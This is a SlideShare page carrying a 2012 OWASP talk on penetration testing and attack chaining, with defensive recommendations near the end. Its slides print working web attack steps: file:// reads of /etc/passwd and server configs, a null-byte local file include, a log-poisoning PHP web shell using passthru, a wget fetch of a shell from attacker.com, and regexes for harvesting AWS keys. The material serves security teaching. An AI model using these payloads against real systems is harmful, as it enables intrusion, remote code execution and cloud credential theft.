Attack ChainingAdvanced Maneuvers for Hack FuOWASP ATL31 May 2012
About Us  WHO ARE THES DUDES? •  Rob                      •  Oscar    Sr. Security Associate      Security Associate    @ ...
Penetration Test           vs.Vulnerability Assessment                           3	  
vs.      4	  
Simulate a real worldattack against atarget network orapplication.                - EVERYBODY                             ...
It answers thequestion, “couldsomeone break in?”                     6	  
Penetration Testing                              Exploit &                              Penetrate	InformationGathering	   ...
Pen Testing Scenario •  Web application penetration test •  Cloud-based infrastructure hosts multiple    sites •  Out-sour...
Step 1 – Explore                   9	  
Step 2 – Read Code http://vuln.com/dir/share.js ... AJAX.Call({ method:’POST’, url:’include/s_proxy.php’ ...              ...
Step 3 – Proxy? http://vuln.com/dir/include/s_proxy.php? redirect_url=http://www.google.com                               ...
Step 4 – Read Local Files! http://vuln.com/dir/include/s_proxy.php? redirect_url=file:///etc/passwd                       ...
Attack Chaining – Maneuver 1                               13	  
Attack Chaining – Maneuver 1                               14	  
Step 5 – Gather More Info http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///etc/httpd/conf/httpd.conf         ...
Step 6 – Keep Going… http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///etc/httpd/conf/virtual.conf            ...
Step 6 – Keep Going… http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///etc/httpd/conf/virtual.conf  VirtualHos...
Step 7 – Back to DirBuster                             18	  
Step 8 – Review Code http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///var/www/sites/vuln.com/ docroot/dir/inc...
Step 8 – Review Code  http://vuln.com/dir/include/s_proxy.php  ?redirect_url=file:///var/www/sites/vuln.com/  docroot/dir/...
Attack Chaining – Maneuver 2                               21	  
Attack Chaining – Maneuver 2                               22	  
Step 9 – Null Byte Injection http://vuln.com/dir/include/controller.php ?module=../../../../../../etc/passwd%00           ...
Step 8 – Review Codehttp://vuln.com/dir/include/s_proxy.php?redirect_url=file:///var/www/sites/vuln.com/docroot/dir/includ...
Step 10 – Review Gathered Info http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///etc/httpd/conf/virtual.conf  ...
Step 10 – Back to Virtual Conf http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///etc/httpd/conf/virtual.conf V...
Step 11 – Where To Stick It? http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///etc/httpd/logs/vuln.com_ error_...
Step 12 – Poison Logs                        28	  
Step 12 – Poison Logs                        29	  
Step 12 – Poison Logs ? echo pre; passthru($_GET[cmd]); echo /pre; ?                            30	  
Step 13 – PHP in the Log http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///etc/httpd/logs/vuln.com_ error_log ...
Step 13 – PHP in the Log http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///etc/httpd/logs/vuln.com_ error_log ...
Step 14 – Execute Code http://vuln.com/dir/include/controller.php ?module=/../../../../../../../../etc/httpd/ logs/vuln.co...
Step 14 – Execute Code ? echo pre; passthru(ls); echo /pre; ? /var/www/sites/vuln.com/docroot/wp-content/themes/ lulzcat-a...
Attack Chaining – Maneuver 3                               35	  
Attack Chaining – Maneuver 3                               36	  
Step 15 – Upload Shell http://vuln.com/dir/include/controller.php ?module=/../../../../../../../../etc/httpd/ logs/vuln.co...
Step 16 – Enjoy!                   38	  
Step 17 – I	  want	  more!ec2[^d][][A-Z0-9]{20}[]ec2.*[][A-Z0-9]{20}[] [][A-Za-z0-9+/]{40}[]ec2.*[][A-Z0-9]{20}[]ec2(D)*[]...
Step 18 – Amazon	  AWS	  Regex$this-­‐amazonService	  =	  new	  Zend_Service_Amazon(DB3BAD768F2F11C7628,	  	  $aws_key	  =...
Step 19 – AWS	  Takeover                            41	  
Step 20 – Make	  It	  Your	  Own                                  42	  
Cost of Amazon Cloud Compromise        CRI TICAL EXPOSURE 1.  Found 8 Amazon Secret Keys to access Amazon S3 2.  Found tha...
Take Them Off The Web        CRI TICAL EXPOSURE 1.  Found 8 Amazon Secret Keys to access Amazon S3 2.  Found that 2 of the...
Attack Chaining – Hack Fu                            45	  
Attack Chaining – Hack Fu                            46	  
Why Is This Happening? 1.  Local File Include    4.  Insecure Credential     •  File Read Only         Storage     •  Code...
Web à Mass Malware Deployment                                 48	  
Web à Data Center Compromise                                49	  
Web à Internal Network Compromise                                     50	  
Internal Assessmentà SSN  Bank #’s                                       51	  
Infrastructure Review                        52	  
Step 1 – Target Wireless                           53	  
Step 1 – Target Wireless                           54	  
Step 2 – Port Scan                     55	  
Step 3 – Test Default Creds                              56	  
Infrastructure Apocalypse                            57	  
Step 4 – Control AP                      58	  
Step 5 – Read All E-mail                           59	  
Step 6 – Listen To VOIP                          60	  
Step 7 – Open All Doors                          61	  
Step 7 – Open All Doors                          62	  
63	  
Step 7 – Server Room Door                            64	  
Is This Real Life? 1.  Insecure Wireless   4.  Weak Passwords     Encryption          5.  Sensitive Information 2.  Improp...
Protection – How? 1.  People 2.  Policy 3.  Processes 4.  Strategic / Tactical     Security 5.  Defense In-Depth          ...
Defense In-Depth      I S P R O T E C T I O N A G A I N S T. . .                                                   67	  
How Do You Get Better?                         68	  
Synthesis and Patterns    CAN BE BOTH GOOD AND BAD                               69	  
Attack Visualization           LIKE BOBBY FISCHER                                70	  
Thank You            72	  
Attack Chaining: Advanced Maneuvers for Hack Fu
Upcoming SlideShare
Loading in...5
×

Attack Chaining: Advanced Maneuvers for Hack Fu

3,443

Published on

Just as a good chess player thinks five moves ahead, a great penetration tester should be able to visualize their attack in order to compromise high-value targets. This presentation will explore how a penetration tester can learn to leverage attack chaining for maximum impact. A penetration test is supposed to be a simulation of a real-world attack. Real-world attackers do not use expensive automated tools or a checklist. Nor do they use a single technique or exploit to compromise a target. More commonly they combine several techniques, vulnerabilities, and exploits to create a “chained” attack that achieves a malicious goal. Chained attacks are far more complex and far more difficult to defend against. We want to explore how application vulnerabilities relate to one another and build a mind map that guides penetration testers through various attack scenarios. Prepare to be blown away on this roller coaster ride with real-world examples of massive compromises. If you are not a thrill seeker, this presentation may leave you a bit queasy.

Published in: Technology, Design
1 Comment
3 Likes
Statistics
Notes
  • Free Download : http://gg.gg/114bb
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
No Downloads
Views
Total Views
3,443
On Slideshare
0
From Embeds
0
Number of Embeds
2
Actions
Shares
0
Downloads
104
Comments
1
Likes
3
Embeds 0
No embeds

No notes for slide

Attack Chaining: Advanced Maneuvers for Hack Fu

  1. 1. Attack ChainingAdvanced Maneuvers for Hack FuOWASP ATL31 May 2012
  2. 2. About Us WHO ARE THES DUDES? •  Rob •  Oscar Sr. Security Associate Security Associate @ Stach & Liu @ Stach & Liu 2  
  3. 3. Penetration Test vs.Vulnerability Assessment 3  
  4. 4. vs. 4  
  5. 5. Simulate a real worldattack against atarget network orapplication. - EVERYBODY 5  
  6. 6. It answers thequestion, “couldsomeone break in?” 6  
  7. 7. Penetration Testing Exploit & Penetrate InformationGathering 2 3 Escalate Privileges 1 Maintain 4a 4b Access Deny Access
  8. 8. Pen Testing Scenario •  Web application penetration test •  Cloud-based infrastructure hosts multiple sites •  Out-sourced PHP development to many contractors •  Determine attackers ability to compromise PII or infrastructure 8  
  9. 9. Step 1 – Explore 9  
  10. 10. Step 2 – Read Code http://vuln.com/dir/share.js ... AJAX.Call({ method:’POST’, url:’include/s_proxy.php’ ... 10  
  11. 11. Step 3 – Proxy? http://vuln.com/dir/include/s_proxy.php? redirect_url=http://www.google.com 11  
  12. 12. Step 4 – Read Local Files! http://vuln.com/dir/include/s_proxy.php? redirect_url=file:///etc/passwd 12  
  13. 13. Attack Chaining – Maneuver 1 13  
  14. 14. Attack Chaining – Maneuver 1 14  
  15. 15. Step 5 – Gather More Info http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///etc/httpd/conf/httpd.conf 15  
  16. 16. Step 6 – Keep Going… http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///etc/httpd/conf/virtual.conf 16  
  17. 17. Step 6 – Keep Going… http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///etc/httpd/conf/virtual.conf VirtualHost * ServerName vuln.com  DocumentRoot /var/www/sites/vuln.com/docroot ErrorLog logs/vuln.com_error_log /VirtualHost 17  
  18. 18. Step 7 – Back to DirBuster 18  
  19. 19. Step 8 – Review Code http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///var/www/sites/vuln.com/ docroot/dir/include/controller.php 19  
  20. 20. Step 8 – Review Code http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///var/www/sites/vuln.com/ docroot/dir/include/controller.php?phprequire_once(includes/config.php);$module = !empty($_REQUEST[module]) ? $_REQUEST[module] :$config[module];$action = !empty($_REQUEST[action]) ? $_REQUEST[action] :$config[action];$currentModuleFile = modules/.$module./.$action..php;include($currentModuleFile)exit;? 20  
  21. 21. Attack Chaining – Maneuver 2 21  
  22. 22. Attack Chaining – Maneuver 2 22  
  23. 23. Step 9 – Null Byte Injection http://vuln.com/dir/include/controller.php ?module=../../../../../../etc/passwd%00 23  
  24. 24. Step 8 – Review Codehttp://vuln.com/dir/include/s_proxy.php?redirect_url=file:///var/www/sites/vuln.com/docroot/dir/include/controller.php?phprequire_once(includes/config.php);$module = !empty($_REQUEST[module]) ? $_REQUEST[module] :$config[module];$action = !empty($_REQUEST[action]) ? $_REQUEST[action] :$config[action];$currentModuleFile = modules/.$module./.$action..php;include($currentModuleFile)exit;? 24  
  25. 25. Step 10 – Review Gathered Info http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///etc/httpd/conf/virtual.conf 25  
  26. 26. Step 10 – Back to Virtual Conf http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///etc/httpd/conf/virtual.conf VirtualHost * ServerName vuln.com DocumentRoot /var/www/sites/vuln.com/docroot ErrorLog logs/vuln.com_error_log /VirtualHost 26  
  27. 27. Step 11 – Where To Stick It? http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///etc/httpd/logs/vuln.com_ error_log [error] [client 10.10.65.18] File does not exist: /var/www/sites/vuln.com/docroot/wp-content/themes/ lulzcat.jpg, referer: http://www.vuln.com/ 27  
  28. 28. Step 12 – Poison Logs 28  
  29. 29. Step 12 – Poison Logs 29  
  30. 30. Step 12 – Poison Logs ? echo pre; passthru($_GET[cmd]); echo /pre; ? 30  
  31. 31. Step 13 – PHP in the Log http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///etc/httpd/logs/vuln.com_ error_log [error] [client 10.10.65.18] File does not exist: /var/www/sites/vuln.com/docroot/wp-content/themes/ lulzcat.jpg, referer: http://www.vuln.com/ 31  
  32. 32. Step 13 – PHP in the Log http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///etc/httpd/logs/vuln.com_ error_log [error] [client 10.10.65.18] File does not exist: /var/www/sites/vuln.com/docroot/wp-content/themes/ lulzcat.jpg, referer: http://www.vuln.com/ [error] [client 10.10.65.18] File does not exist: /var/www/sites/vuln.com/docroot/wp-content/themes/ lulzcat-attack.jpg, referer: ? echo pre;passthru( $_GET[cmd]);echo pre; ? 32  
  33. 33. Step 14 – Execute Code http://vuln.com/dir/include/controller.php ?module=/../../../../../../../../etc/httpd/ logs/vuln.com_error_log%00cmd=ls; /var/www/sites/vuln.com/docroot/wp-content/themes/ lulzcat-attack.jpg, referer: controller.php example.php includes modules phpinfo.php … 33  
  34. 34. Step 14 – Execute Code ? echo pre; passthru(ls); echo /pre; ? /var/www/sites/vuln.com/docroot/wp-content/themes/ lulzcat-attack.jpg, referer: controller.php example.php includes modules phpinfo.php … 34  
  35. 35. Attack Chaining – Maneuver 3 35  
  36. 36. Attack Chaining – Maneuver 3 36  
  37. 37. Step 15 – Upload Shell http://vuln.com/dir/include/controller.php ?module=/../../../../../../../../etc/httpd/ logs/vuln.com_error_log%00cmd=wget%20http:// attacker.com/gny.php;   37  
  38. 38. Step 16 – Enjoy! 38  
  39. 39. Step 17 – I  want  more!ec2[^d][][A-Z0-9]{20}[]ec2.*[][A-Z0-9]{20}[] [][A-Za-z0-9+/]{40}[]ec2.*[][A-Z0-9]{20}[]ec2(D)*[][A-Z0-9]{20}[]amazon.*[][A-Z0-9]{20}[](amazon|ec2).*[][A-Z0-9]{20}[]amazon(D)*[][A-Z0-9]{20}[]access secret [][A-Z0-9]{20}[] [A-Za-z0-9+/]{40}amazon.*[][A-Z0-9]{20}[].*[][A-Za-z0-9+/]{40}[]aws.*[][A-Z0-9]{20}[] [][A-Za-z0-9+/]{40}[]amazon.*[][A-Z0-9]{20}[] [][A-Za-z0-9+/]{40}[]secret.*[][A-Za-z0-9+/]{40}[][][A-Za-z0-9+/]{40}[].*amazon 39  
  40. 40. Step 18 – Amazon  AWS  Regex$this-­‐amazonService  =  new  Zend_Service_Amazon(DB3BAD768F2F11C7628,    $aws_key  =  8AFB5AF55D1E6620EE1;    define(AMAZON_KEY,  372B8E408D1484C538F);    if  (!defined(awsAccessKey))  define(awsAccessKey,  9F6EB7471C926194884);    //if  (!defined(awsAccessKey))  define(awsAccessKey,  4CAD89B86344CD8C26C);    define(AMAZON_AES_ACCESS_KEY_ID,  95C95B8DC84AA24C0EC);   40  
  41. 41. Step 19 – AWS  Takeover 41  
  42. 42. Step 20 – Make  It  Your  Own 42  
  43. 43. Cost of Amazon Cloud Compromise CRI TICAL EXPOSURE 1.  Found 8 Amazon Secret Keys to access Amazon S3 2.  Found that 2 of the 8 have administrator access to Amazon EC2 3.  Attacker launches 100 Extra Large Clusters$1,049,000 43  
  44. 44. Take Them Off The Web CRI TICAL EXPOSURE 1.  Found 8 Amazon Secret Keys to access Amazon S3 2.  Found that 2 of the 8 have administrator access to Amazon EC2 3.  Attacker shuts down and deletes all servers and backups permanentlyPRICELESS 44  
  45. 45. Attack Chaining – Hack Fu 45  
  46. 46. Attack Chaining – Hack Fu 46  
  47. 47. Why Is This Happening? 1.  Local File Include 4.  Insecure Credential •  File Read Only Storage •  Code Execution 5.  Overly Permissive 2.  Null Byte Injection Amazon AWS Keys 3.  Log Poisoning 6.  Sensitive Information Disclosure 47  
  48. 48. Web à Mass Malware Deployment 48  
  49. 49. Web à Data Center Compromise 49  
  50. 50. Web à Internal Network Compromise 50  
  51. 51. Internal Assessmentà SSN Bank #’s 51  
  52. 52. Infrastructure Review 52  
  53. 53. Step 1 – Target Wireless 53  
  54. 54. Step 1 – Target Wireless 54  
  55. 55. Step 2 – Port Scan 55  
  56. 56. Step 3 – Test Default Creds 56  
  57. 57. Infrastructure Apocalypse 57  
  58. 58. Step 4 – Control AP 58  
  59. 59. Step 5 – Read All E-mail 59  
  60. 60. Step 6 – Listen To VOIP 60  
  61. 61. Step 7 – Open All Doors 61  
  62. 62. Step 7 – Open All Doors 62  
  63. 63. 63  
  64. 64. Step 7 – Server Room Door 64  
  65. 65. Is This Real Life? 1.  Insecure Wireless 4.  Weak Passwords Encryption 5.  Sensitive Information 2.  Improper Network Disclosure Segmentation 3.  Insecure Default Configuration 65  
  66. 66. Protection – How? 1.  People 2.  Policy 3.  Processes 4.  Strategic / Tactical Security 5.  Defense In-Depth 66  
  67. 67. Defense In-Depth I S P R O T E C T I O N A G A I N S T. . . 67  
  68. 68. How Do You Get Better? 68  
  69. 69. Synthesis and Patterns CAN BE BOTH GOOD AND BAD 69  
  70. 70. Attack Visualization LIKE BOBBY FISCHER 70  
  71. 71. Thank You 72  
  1. A particular slide catching your eye?

    Clipping is a handy way to collect important slides you want to go back to later.

×